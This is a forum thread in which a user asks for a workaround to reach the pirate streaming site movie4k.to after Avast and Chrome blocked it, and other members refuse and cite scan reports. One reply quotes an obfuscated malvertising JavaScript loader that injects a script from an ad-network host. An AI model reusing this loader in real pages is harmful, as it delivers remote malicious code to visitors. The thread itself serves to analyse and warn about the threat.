accessing website

I use a website to watch movies and tv shows, movie4k.to. Avast’s latest virus and malware update has caused google chrome to completely block this website. Granted this website does have a lot of pop up windows and perhaps malware. I am hoping you guys can help me re-access the website with a workaround for google chrome. Thanks for your attention to this matter.

We do not help people to access a malicious domain/IP.

These are just a few scan results:
http://zulu.zscaler.com/submission/show/64c5e4d6c9598a536dc6e39dc0de4b07-1437992994
http://urlquery.net/report.php?id=1437993130925
http://www.urlvoid.com/scan/movie4k.to/

@ belgarath321,
Haven’t you ever heard of Popcorn Time ???

bob…not sure popcorn time is the best choice:
http://www.ibtimes.com/popcorn-time-safe-pirate-bay-netflix-comparisons-provide-little-legal-clarification-1692417

I have not received any email or letter from a movie company/service provider while using movie4k.to and I have been using that site for 3+ years now and previous to that site was movie2k.to. It has a lot of tv shows and movies. Someone piggybacked/attached some malicious codes to certain files/movies. Which ones? I cannot tell you, but overall the site is fine. Avast’s latest update suddenly created this block, prior to the last avast update (which was automatically uploaded by avast) I was able to use the site. Can I go back to an older version of avast without this latest update so I can continue using movie4k.to site? Or do I have to remove Avast to use this site?

Legally I doubt that there’s any difference between the two services. :slight_smile:

avast blocks correct
The ads malicious ad load injecting malvertising to other pages

hxxps://totaladperformance.com/ad/display.php?zone=412589

https://www.virustotal.com/en/url/d17dc56d89049891851b17d1e454b3cd89bd5e92fe2e5d4f75e96674e8161c2f/analysis/1438467655/

(func​tion (document, scriptElement, firstScript) { scriptElement = document.create​Element(' sc​ript '); scriptCFASync = document.createAttribute("data-cfasync"); scriptCFASync.value = false; scriptElement.setAttributeNode(scriptCFASync); scriptElement.src = "https:\/\/totaladperformance.com\/ad\/display.php?zone=412589&runauction=1&crr=3db70a301b9606340c82lJUUxF0O1lnWKZkcLdGVORUcmdEMmQGc2VTMms0WPNFRrxUTWZVR7IFUQVENzczRwYiamVTMmozO2EjM3cEM2EjJm1Gb5VEM2EjJzt2ctonYvNHcqdWRxYTMmcmYFFjNxYibsBWLmBWbi5WcsVWcmN3Zi9mY3x2dFFjNxYSRxYTMmIEM2EjJwN3d3t2RwYybxZXNxYSR7YDd0dTSsB2RwYyZmVXNxYyOHBjJ3BmY2VTMmIWaxdEMmcmYgVTMmAzRwYyZgVTMmEmZ0dEMmYGYxZHbwVTMmA3RwYCYxBnZ1EjJHBjJyVTMmk2RwYydgFXNxYydHBjJiBXRwYybxZXRxYibsBWLm9GZsxGZtQHd0VUMmUUMmIEMmA3c3d3a33247a7442449c375d10" + '&cbrandom=' + Math.random(); firstScript = document.scripts[0]; if(typeof firstScript == 'undefined'){ firstScript = document.getElementsByTagName( ' sc​ript ' )[0]; } firstScript.parentNode.insertBefore(scriptElement, firstScript) }(document));

suspicious

https://www.virustotal.com/en/url/b6fb4287de8c3bbc00f757170cb89ab2104f228d58fec3e803d881a82175f41b/analysis/1438467397/

This domain is listed in the hpHOSTS blacklist. Website’s in this database

http://hosts-file.net/?s=www.movie4k.to.

Why you wish to continue to use this site is beyond me: http://quttera.com/detailed_report/www.movie4k.to

28 malicious files found (links to blacklisted sites)